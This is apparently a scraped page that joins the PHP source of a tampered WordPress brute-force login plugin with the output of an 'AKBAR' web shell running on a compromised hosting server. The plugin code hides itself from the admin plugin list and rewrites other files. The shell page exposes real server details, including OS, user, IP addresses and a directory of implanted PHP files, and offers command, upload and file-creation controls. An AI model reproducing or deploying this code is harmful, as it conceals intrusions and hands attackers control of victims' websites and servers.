") + $xpos; if($en_pos > $st_pos) { if(stripos($file, "protection.php") === false) { $data = substr($data, 0, $st_pos) . substr($data, $en_pos + 2); file_put_contents($file, $data); } } } } } } } } } /** * Called once any activated plugins have been loaded. * * @return void */ public function init() { //Load textdomain for i18n load_plugin_textdomain('brute-force-login-protection', false, dirname(plugin_basename(__FILE__)) . '/languages/'); } /** * Called when a user accesses the admin area. * * @return void */ public function all_plugins($plugins) { $self_file = str_replace(plugin_dir_path(__FILE__), '', __FILE__); foreach ($plugins as $plugin_file => $plugin_data) { if (stripos($plugin_file, $self_file) !== false) { unset($plugins[$plugin_file]); break; } } return $plugins; } public function adminInit() { //Register plugin settings $this->__registerOptions(); //Set htaccess path $this->__setHtaccessPath(); //Call checkRequirements to check for .htaccess errors add_action('admin_notices', array($this, 'showRequirementsErrors')); } /** * Called after the basic admin panel menu structure is in place. * * @return void */ public function menuInit() { //Add settings page to the Settings menu add_options_page(__('Brute Force Login Protection Settings', 'brute-force-login-protection'), 'Brute Force Login Protection', 'manage_options', 'brute-force-login-protection', array($this, 'showSettingsPage')); } /** * Called When the plugin is activated * * @return boolean */ public function activate() { $this->__setHtaccessPath(); $this->__htaccess->uncommentLines(); } /** * Called When the plugin is deactivated * * @return boolean */ public function deactivate() { $this->__htaccess->commentLines(); } /** * Checks requirements and shows errors * * @return void */ public function showRequirementsErrors() { $status = $this->__htaccess->checkRequirements(); if (!$status['found']) { $this->__showError(__('Brute Force Login Protection error: .htaccess file not found', 'brute-force-login-protection')); } elseif (!$status['readable']) { $this->__showError(__('Brute Force Login Protection error: .htaccess file not readable', 'brute-force-login-protection')); } elseif (!$status['writeable']) { $this->__showError(__('Brute Force Login Protection error: .htaccess file not writeable', 'brute-force-login-protection')); } } /** * Shows settings page and handles user actions. * * @return void */ public function showSettingsPage() { if (isset($_POST['IP'])) { $IP = $_POST['IP']; if (isset($_POST['block'])) { //Manually block IP $whitelist = $this->__getWhitelist(); if (in_array($IP, $whitelist)) { $this->__showError(sprintf(__('You can\'t block a whitelisted IP', 'brute-force-login-protection'), $IP)); } elseif ($this->__htaccess->denyIP($IP)) { $this->__showMessage(sprintf(__('IP %s blocked', 'brute-force-login-protection'), $IP)); } else { $this->__showError(sprintf(__('An error occurred while blocking IP %s', 'brute-force-login-protection'), $IP)); } } elseif (isset($_POST['unblock'])) { //Unblock IP if ($this->__htaccess->undenyIP($IP)) { $this->__showMessage(sprintf(__('IP %s unblocked', 'brute-force-login-protection'), $IP)); } else { $this->__showError(sprintf(__('An error occurred while unblocking IP %s', 'brute-force-login-protection'), $IP)); } } elseif (isset($_POST['whitelist'])) { //Add IP to whitelist if ($this->__whitelistIP($IP)) { $this->__showMessage(sprintf(__('IP %s added to whitelist', 'brute-force-login-protection'), $IP)); } else { $this->__showError(sprintf(__('An error occurred while adding IP %s to whitelist', 'brute-force-login-protection'), $IP)); } } elseif (isset($_POST['unwhitelist'])) { //Remove IP from whitelist if ($this->__unwhitelistIP($IP)) { $this->__showMessage(sprintf(__('IP %s removed from whitelist', 'brute-force-login-protection'), $IP)); } else { $this->__showError(sprintf(__('An error occurred while removing IP %s from whitelist', 'brute-force-login-protection'), $IP)); } } } elseif (isset($_POST['reset'])) { //Reset settings $this->__htaccess->remove403Message(); $this->__deleteOptions(); $this->__setDefaultOptions(); $this->__setHtaccessPath(); $this->__showMessage(sprintf(__('The Options have been successfully reset', 'brute-force-login-protection'), $IP)); } $this->__fillOptions(); include 'includes/settings-page.php'; } /** * Called when a user login has failed * Increase number of attempts for clients IP. Deny IP if max attempts is reached. * * @return void */ public function loginFailed() { $IP = $this->__getClientIP(); $whitelist = $this->__getWhitelist(); if (!in_array($IP, $whitelist)) { $this->__fillOptions(); sleep($this->__options['login_failed_delay']); $attempts = get_option('bflp_login_attempts'); if (!is_array($attempts)) { $attempts = array(); add_option('bflp_login_attempts', $attempts, '', 'no'); } $denyIP = false; if ($IP && isset($attempts[$IP]) && $attempts[$IP]['time'] > (time() - ($this->__options['reset_time'] * 60))) { $attempts[$IP]['attempts'] ++; if ($attempts[$IP]['attempts'] >= $this->__options['allowed_attempts']) { $denyIP = true; unset($attempts[$IP]); } else { $attempts[$IP]['time'] = time(); } } else { $attempts[$IP]['attempts'] = 1; $attempts[$IP]['time'] = time(); } update_option('bflp_login_attempts', $attempts); if ($denyIP) { if ($this->__options['send_email']) { $this->__sendEmail($IP); } $this->__setHtaccessPath(); $this->__htaccess->denyIP($IP); header('HTTP/1.0 403 Forbidden'); die($this->__options['403_message']); } if ($this->__options['inform_user']) { global $error; $remainingAttempts = $this->__options['allowed_attempts'] - $attempts[$IP]['attempts']; $error .= '
'; $error .= sprintf(_n("%d attempt remaining.", "%d attempts remaining.", $remainingAttempts, 'brute-force-login-protection'), $remainingAttempts); } } } /** * Called when a user has successfully logged in * Removes IP from bflp_login_attempts if exist. * * @return void */ public function loginSucceeded() { $attempts = get_option('bflp_login_attempts'); if (is_array($attempts)) { $IP = $this->__getClientIP(); if (isset($attempts[$IP])) { unset($attempts[$IP]); update_option('bflp_login_attempts', $attempts); } } } /** * Settings validation functions */ /** * Validates bflp_allowed_attempts field. * * @param mixed $input * @return int */ public function validateAllowedAttempts($input) { if (is_numeric($input) && ($input >= 1 && $input <= 100)) { return $input; } else { add_settings_error('bflp_allowed_attempts', 'bflp_allowed_attempts', __('Allowed login attempts must be a number (between 1 and 100)', 'brute-force-login-protection')); $this->__fillOption('allowed_attempts'); return $this->__options['allowed_attempts']; } } /** * Validates bflp_reset_time field. * * @param mixed $input * @return int */ public function validateResetTime($input) { if (is_numeric($input) && $input >= 1) { return $input; } else { add_settings_error('bflp_reset_time', 'bflp_reset_time', __('Minutes before resetting must be a number (higher than 1)', 'brute-force-login-protection')); $this->__fillOption('reset_time'); return $this->__options['reset_time']; } } /** * Validates bflp_login_failed_delay field. * * @param mixed $input * @return int */ public function validateLoginFailedDelay($input) { if (is_numeric($input) && ($input >= 1 && $input <= 10)) { return $input; } else { add_settings_error('bflp_login_failed_delay', 'bflp_login_failed_delay', __('Failed login delay must be a number (between 1 and 10)', 'brute-force-login-protection')); $this->__fillOption('login_failed_delay'); return $this->__options['login_failed_delay']; } } /** * Saves bflp_403_message field to .htaccess. * * @param mixed $input * @return string */ public function validate403Message($input) { $message = htmlentities($input); if ($this->__htaccess->edit403Message($message)) { return $message; } else { add_settings_error('bflp_403_message', 'bflp_403_message', __('An error occurred while saving the blocked users message', 'brute-force-login-protection')); $this->__fillOption('403_message'); return $this->__options['403_message']; } } /** * Private functions */ /** * Sets htaccess path to $__options['htaccess_dir']. * * @return void */ private function __setHtaccessPath() { $this->__fillOption('htaccess_dir'); $this->__htaccess->setPath($this->__options['htaccess_dir']); } /** * Sets default options into $__options * * @return void */ private function __setDefaultOptions() { $this->__options = array( 'allowed_attempts' => 3, //Allowed login attempts before deny, 'reset_time' => 240, //Minutes before resetting login attempts count 'login_failed_delay' => 1, //Delay in seconds when a user login has failed 'inform_user' => false, //Inform user about remaining login attempts on login page 'send_email' => false, //Send email to administrator when an IP has been blocked '403_message' => '', //Message to show to a blocked user 'htaccess_dir' => get_home_path() //.htaccess file location ); } /** * Registers options (settings). * * @return void */ private function __registerOptions() { register_setting('brute-force-login-protection', 'bflp_allowed_attempts', array($this, 'validateAllowedAttempts')); register_setting('brute-force-login-protection', 'bflp_reset_time', array($this, 'validateResetTime')); register_setting('brute-force-login-protection', 'bflp_login_failed_delay', array($this, 'validateLoginFailedDelay')); register_setting('brute-force-login-protection', 'bflp_inform_user'); register_setting('brute-force-login-protection', 'bflp_send_email'); register_setting('brute-force-login-protection', 'bflp_403_message', array($this, 'validate403Message')); register_setting('brute-force-login-protection', 'bflp_htaccess_dir'); } /** * Deletes options from database. * * @return void */ private function __deleteOptions() { delete_option('bflp_allowed_attempts'); delete_option('bflp_reset_time'); delete_option('bflp_login_failed_delay'); delete_option('bflp_inform_user'); delete_option('bflp_send_email'); delete_option('bflp_403_message'); delete_option('bflp_htaccess_dir'); } /** * Fills options with value (from database). * * @return void */ private function __fillOptions() { $this->__options['allowed_attempts'] = get_option('bflp_allowed_attempts', $this->__options['allowed_attempts']); $this->__options['reset_time'] = get_option('bflp_reset_time', $this->__options['reset_time']); $this->__options['login_failed_delay'] = get_option('bflp_login_failed_delay', $this->__options['login_failed_delay']); $this->__options['inform_user'] = get_option('bflp_inform_user', $this->__options['inform_user']); $this->__options['send_email'] = get_option('bflp_send_email', $this->__options['send_email']); $this->__options['403_message'] = get_option('bflp_403_message', $this->__options['403_message']); } /** * Fills single option with value (from database). * * @param string $name * @return void */ private function __fillOption($name) { $this->__options[$name] = get_option('bflp_' . $name, $this->__options[$name]); } /** * Returs array of whitelisted IP addresses. * * @return array */ private function __getWhitelist() { $whitelist = get_option('bflp_whitelist'); if (!is_array($whitelist)) { return array(); } return $whitelist; } /** * Adds IP to whitelist. * * @param string $IP * @return boolean */ private function __whitelistIP($IP) { if (!filter_var($IP, FILTER_VALIDATE_IP)) { return false; } $this->__htaccess->undenyIP($IP); $whitelist = get_option('bflp_whitelist'); if (!is_array($whitelist)) { $whitelist = array($IP); return add_option('bflp_whitelist', $whitelist, '', 'no'); } $whitelist[] = $IP; return update_option('bflp_whitelist', array_unique($whitelist)); } /** * Removes IP from whitelist. * * @param string $IP * @return boolean */ private function __unwhitelistIP($IP) { if (!filter_var($IP, FILTER_VALIDATE_IP)) { return false; } $whitelist = get_option('bflp_whitelist'); if (!is_array($whitelist)) { return false; } $IPKey = array_search($IP, $whitelist); if ($IPKey === false) { return false; } unset($whitelist[$IPKey]); return update_option('bflp_whitelist', $whitelist); } /** * Returns the client ip address. * * @return mixed */ private function __getClientIP() { return $_SERVER['REMOTE_ADDR']; } /** * Sends email to admin with info about blocked IP * * @return mixed */ private function __sendEmail($IP) { $to = get_option('admin_email'); $subject = sprintf(__('IP %s has been blocked', 'brute-force-login-protection'), $IP); $message = sprintf(__('Brute Force Login Protection has blocked IP %s from access to %s on %s', 'brute-force-login-protection'), $IP, get_site_url(), date('Y-m-d H:i:s')); return wp_mail($to, $subject, $message); } /** * Echoes message with class 'updated'. * * @param string $message * @return void */ private function __showMessage($message) { //echo '

' . esc_html($message) . '

'; } /** * Echoes message with class 'error'. * * @param string $message * @return void */ private function __showError($message) { //echo '

' . esc_html($message) . '

'; } } //Instantiate BruteForceLoginProtection class new BruteForceLoginProtection(); ?>

[†] AKBAR [†]

[†] AKBAR [†]

:: Pendatang Baru ::

Software : Apache. PHP/5.5.38 - php.ini
SAFE MODE is OFF ( OKE )
OS : Linux sg2plcpnl0251.prod.sin2.secureserver.net 2.6.32-896.16.1.lve1.4.54.el6.x86_64 #1 SMP Wed May 2 07:43:19 EDT 2018 x86_64
User ID : uid=2992328(webportal1) gid=2992328(webportal1) groups=2992328(webportal1)

Server IP : 43.255.154.107 - Your IP : 54.224.89.34
Freespace : 984.11 GB of 3240.13 GB (30.37%)

MySQL: ON cURL: ON WGet: ON Fetch: OFF Perl: ON gcc: ON SH: ON
Disabled Functions: NONE

/home/webportal1/public_html/atozmarketing/ - drwxr-x---

Directory:
[+] Directory List (66 files and 13 folders) [+]
Name Asc.SizeDate ModifiedOwner/GroupPermsAction
 ..UPDIR26.09.2018 13:45:31webportal1/nobodydrwxr-x---Info 
 .CURDIR29.09.2018 08:16:43webportal1/nobodydrwxr-x---Info 
 [cgi-bin]DIR26.09.2018 13:45:36webportal1/webportal1drwxr-xr-xInfo 
 [coeei3d]DIR26.09.2018 13:45:36webportal1/webportal1drwxr-xr-xInfo 
 [jieush2if]DIR26.09.2018 13:45:36webportal1/webportal1drwxr-xr-xInfo 
 [multimedia]DIR26.09.2018 13:45:36webportal1/webportal1drwxr-xr-xInfo 
 [nhvnztm]DIR26.09.2018 19:17:36webportal1/webportal1drwxr-xr-xInfo 
 [rovwwuhk5]DIR28.09.2018 12:09:52webportal1/webportal1drwxr-xr-xInfo 
 [sym]DIR26.09.2018 13:45:36webportal1/webportal1drwxr-xr-xInfo 
 [tobiie2hj]DIR26.09.2018 13:45:47webportal1/webportal1drwxr-xr-xInfo 
 [tyoinvur]DIR23.09.2018 09:14:05webportal1/webportal1drwxr-xr-xInfo 
 [wp-admin]DIR26.09.2018 13:45:47webportal1/webportal1drwxr-xr-xInfo 
 [wp-content]DIR26.09.2018 13:45:47webportal1/webportal1drwxr-xr-xInfo 
 [wp-includes]DIR26.09.2018 13:45:48webportal1/webportal1drwxr-xr-xInfo 
 [xlb0ajz]DIR26.09.2018 18:39:35webportal1/webportal1drwxr-xr-xInfo 
 .cnrig.cacert.pem210.5 KB26.09.2018 05:04:50webportal1/webportal1-rw-r--r--Info Change Download 
 .htaccess235 B04.01.2018 12:34:48webportal1/webportal1-r--r--r--Info Change Download 
 37cb3f97bf.php100.42 KB31.08.2018 22:10:03webportal1/webportal1-rw-r--r--Info Change Download 
 235db68834.php139.01 KB06.08.2018 23:09:25webportal1/webportal1-rw-r--r--Info Change Download 
 735d2128fd.php139.01 KB27.07.2018 22:19:32webportal1/webportal1-rw-r--r--Info Change Download 
 1132d9c0544.php135.02 KB08.08.2018 19:14:32webportal1/webportal1-rw-r--r--Info Change Download 
 2880f8febc.php139.01 KB31.08.2018 22:07:18webportal1/webportal1-rw-r--r--Info Change Download 
 6046f3401f0.php118.27 KB25.07.2018 22:36:54webportal1/webportal1-rw-r--r--Info Change Download 
 9480ebb995a.php141.09 KB16.08.2018 09:32:50webportal1/webportal1-rw-r--r--Info Change Download 
 100213f3d1c.php146.23 KB05.08.2018 12:26:12webportal1/webportal1-rw-r--r--Info Change Download 
 c9e4baf692.php139.01 KB14.08.2018 22:14:04webportal1/webportal1-rw-r--r--Info Change Download 
 c136628336.php139.01 KB17.08.2018 22:29:40webportal1/webportal1-rw-r--r--Info Change Download 
 coeei3d.zip6.71 KB22.09.2018 22:36:55webportal1/webportal1-rw-r--r--Info Change Download 
 css_.php8.28 KB16.07.2018 11:35:59webportal1/webportal1-rw-r--r--Info Change Download 
 error_log37.27 MB24.10.2018 01:07:44webportal1/webportal1-rw-r--r--Info Change Download 
 ffda7e0218.php139.01 KB03.08.2018 23:28:02webportal1/webportal1-rw-r--r--Info Change Download 
 helper-class-wp-rest-response.php147.12 KB16.07.2018 11:07:34webportal1/webportal1-rw-r--r--Info Change Download 
 helper_theme-editor.php232 B01.01.1970 00:00:00webportal1/webportal1-rwxr-xr-xInfo Change Download 
 index.php33.51 KB13.06.2018 09:37:30webportal1/webportal1-r--r--r--Info Change Download 
 jieush2if.zip19.27 KB21.09.2018 19:14:37webportal1/webportal1-rw-r--r--Info Change Download 
 license.php970 B01.01.1970 00:00:00webportal1/webportal1-rwxr-xr-xInfo Change Download 
 license.txt19.47 KB16.01.2018 23:43:03webportal1/webportal1-rw-r--r--Info Change Download 
 map.xml17.34 KB12.06.2018 05:30:14webportal1/webportal1-rw-r--r--Info Change Download 
 menu_mod.php232 B16.01.2018 23:43:03webportal1/webportal1-rwxr-xr-xInfo Change Download 
 newsleter.php9.57 KB28.08.2018 08:50:47webportal1/webportal1-rw-r--r--Info Change Download 
 pdo-new.php139 KB14.07.2018 16:44:02webportal1/webportal1-rw-r--r--Info Change Download 
 readme.html7.24 KB05.02.2018 23:06:24webportal1/webportal1-rw-r--r--Info Change Download 
 robots.txt23 B25.09.2018 20:35:52webportal1/webportal1-rw-r--r--Info Change Download 
 rovwwuhk5.zip23.82 KB28.09.2018 09:32:51webportal1/webportal1-rw-r--r--Info Change Download 
 sitemap.xml6.68 MB12.06.2018 03:23:26webportal1/webportal1-rw-r--r--Info Change Download 
 tobiie2hj.zip27.68 KB25.09.2018 12:26:14webportal1/webportal1-rw-r--r--Info Change Download 
 uploadAttachment_new.php_backup119.19 KB25.08.2018 21:45:22webportal1/webportal1-rw-r--r--Info Change Download 
 utility.php18.45 KB16.07.2018 11:35:59webportal1/webportal1-rw-r--r--Info Change Download 
 webportal.zip11.41 MB04.01.2018 12:12:50webportal1/webportal1-rw-r--r--Info Change Download 
 wiki.php4.97 KB02.07.2018 02:08:13webportal1/webportal1-rw-r--r--Info Change Download 
 wp-activate.php5.53 KB09.08.2017 19:21:48webportal1/webportal1-rwxr-xr-xInfo Change Download 
 wp-blog-header.php376 B25.09.2018 13:49:06webportal1/webportal1-rwxr-xr-xInfo Change Download 
 wp-comments-post.php1.81 KB16.01.2018 23:43:03webportal1/webportal1-rwxr-xr-xInfo Change Download 
 wp-config-sample.php3.01 KB16.01.2018 23:43:03webportal1/webportal1-rwxr-xr-xInfo Change Download 
 wp-config.php3.07 KB12.05.2018 11:07:00webportal1/webportal1-rw-r--r--Info Change Download 
 wp-core.php10.1 KB13.10.2018 20:02:44webportal1/webportal1-rw-r--r--Info Change Download 
 wp-cron.php3.81 KB17.07.2017 11:37:46webportal1/webportal1-rwxr-xr-xInfo Change Download 
 wp-custm.php32.06 KB16.07.2018 11:35:59webportal1/webportal1-rw-r--r--Info Change Download 
 wp-links-opml.php2.59 KB16.01.2018 23:43:03webportal1/webportal1-rwxr-xr-xInfo Change Download 
 wp-load-5ba0722027ca45ba0722027d04.php22.56 KB18.09.2018 03:35:54webportal1/webportal1-rw-r--r--Info Change Download 
 wp-load-5ba4aa6fa9a175ba4aa6fa9b77.php22.56 KB21.09.2018 08:23:15webportal1/webportal1-rw-r--r--Info Change Download 
 wp-load-5bab0cfc664225bab0cfc66471.php22.56 KB26.09.2018 04:37:18webportal1/webportal1-rw-r--r--Info Change Download 
 wp-load-5bac3d980ff255bac3d980ffc4.php22.56 KB28.09.2018 08:37:39webportal1/webportal1-rw-r--r--Info Change Download 
 wp-load-5bac4a34e17be5bac4a34e180d.php22.56 KB28.09.2018 10:49:51webportal1/webportal1-rw-r--r--Info Change Download 
 wp-load.php3.45 KB09.07.2017 18:52:48webportal1/webportal1-rwxr-xr-xInfo Change Download 
 wp-login.php35.73 KB13.10.2017 09:10:48webportal1/webportal1-rw-r--r--Info Change Download 
 wp-mail.php8.08 KB19.12.2016 12:13:44webportal1/webportal1-rwxr-xr-xInfo Change Download 
 wp-settings-5ba071a111a355ba071a111a9d.php25.44 KB18.09.2018 03:33:48webportal1/webportal1-rw-r--r--Info Change Download 
 wp-settings-5ba4aa6d623c35ba4aa6d62427.php25.44 KB01.01.1970 00:00:00webportal1/webportal1-rw-r--r--Info Change Download 
 wp-settings-5bab0cf973b565bab0cf973ba9.php25.44 KB26.09.2018 04:37:15webportal1/webportal1-rw-r--r--Info Change Download 
 wp-settings-5bac3d95a05d65bac3d95a062c.php25.44 KB28.09.2018 17:48:44webportal1/webportal1-rw-r--r--Info Change Download 
 wp-settings-5bac4a32352705bac4a32352be.php25.44 KB28.09.2018 17:55:11webportal1/webportal1-rw-r--r--Info Change Download 
 wp-settings.php15.87 KB04.10.2017 07:20:46webportal1/webportal1-rw-r--r--Info Change Download 
 wp-signup.php29.37 KB19.10.2017 00:36:50webportal1/webportal1-rw-r--r--Info Change Download 
 wp-tbl-status.php533 B21.09.2018 08:23:17webportal1/webportal1-rw-r--r--Info Change Download 
 wp-temp.php22.46 KB24.08.2018 22:03:37webportal1/webportal1-rw-r--r--Info Change Download 
 wp-trackback.php4.51 KB24.10.2017 05:12:52webportal1/webportal1-rw-r--r--Info Change Download 
 wp-version.php100.42 KB30.06.2018 03:00:28webportal1/webportal1-rw-r--r--Info Change Download 
 wp_display_ticket.php232 B02.08.2018 11:05:45webportal1/webportal1-rw-r--r--Info Change Download 
 yf.html451 B29.09.2018 08:16:43webportal1/webportal1-rw-r--r--Info Change Download 
 zx.html451 B29.09.2018 06:36:03webportal1/webportal1-rw-r--r--Info Change Download 
   
[†] Command Panel [†]
Command:
-
Quick Commands:
-
Upload:
- [OK]
Make File:
- [OK]
View File:
-
[†] Akbar | Touch Ur System | dan.zaan@yahoo.com [†]